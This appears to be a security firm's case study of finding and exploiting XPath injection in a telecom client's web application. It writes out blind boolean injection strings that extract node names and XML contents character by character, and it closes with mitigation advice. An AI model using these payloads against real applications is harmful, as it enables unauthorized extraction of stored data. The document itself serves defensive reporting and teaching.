During a recent engagement to audit an application for a large telecom provider, Torrid Networks’ expert application security team encountered few XPATH injections in the application. The application was though also observed to contain many of the common vulnerabilities including cross-site scripting, iframe injections, information leakage, etc. but the XPATH injection added some interest to the assignment since the application was using XML to store data, and used XPath to query the data.
XPATH injections are bit difficult to identify and little harder to exploit as compared to SQL injection and automated tools add more to the difficulty level further and hence the team didn’t rely upon automated tools during this test. We followed our application security methodology which preach more of manual application security testing than automated.
When the application was passed with the magic quote [‘], it responded in an unusual manner to make our analysts immediately think for presence of a typical sql injection. But soon after that a quick examination of the exception thrown at the browser with the xml document structure revealed possible presence of XPATH injection.
Having identified the Xpath queries on True and False behavior, the application was injected with various queries to extract data.
Extract the XML version:
There are two versions of Xpath i.e. version 1 and version 2 respectively. To detect which version is supported by the application we used lower-case() function as
‘ and lower-case(‘A’)=‘a
An error was generated to conclude that it was version 1 as it does not support lower-case() function.
The XML data is stored in tree representations and for extraction, node-by-node traversal is required.
Extract the parent node:
To extract first letter of the parent node, we injected:
‘ or substring(name(parent::*[position()=1]),1,1)= ‘a
And we got the results (i.e. True behavior) which depicted that the first letter of the parent node was ‘a’.
To extract the second letter of the parent node, we injected a series of queries:
‘ or substring(name(parent::*[position()=1]),2,1)=’a
‘ or substring(name(parent::*[position()=1]),2,1)=’b
‘ or substring(name(parent::*[position()=1]),2,1)=’c
‘ or substring(name(parent::*[position()=1]),2,1)=’d
It was confirmed that the second letter was ‘d’ as the last query generated the results (i.e. True).
Following the same procedure, we extracted the full name of the parent node, which was found to be ‘address’.
To count the number of child nodes the following query was injected
‘ and count(/*)=4 and ‘1’=‘1
This generated no error which confirmed that there were 4 child nodes. Here ‘/*’ is used to iterate through all the nodes.
Having established the name of the “address” node, we then cycled through each of its child nodes, extracting all their names and values.
By cycling through every child node of every address node, and extracting their values one character at a time, the entire contents of the XML data store was extracted.
After creating a detailed analysis and proof-of-concept collected via XPATH injection and other security tests, a comprehensive report was presented to the customer. Development team was explained with mitigation techniques and a quick technical session was offered on how to avoid such security bugs in future application development and was well received by the development team.
It is recommended that the user input should be checked against a white list of acceptable characters, which should ideally include only alphanumeric characters. Characters that may be used to interfere with the XPath query should be blocked, including ( ) = ‘ [ ] : , * /. Any input that does not match the white list should be rejected, not sanitized.
To know more, feel free to write us at firstname.lastname@example.org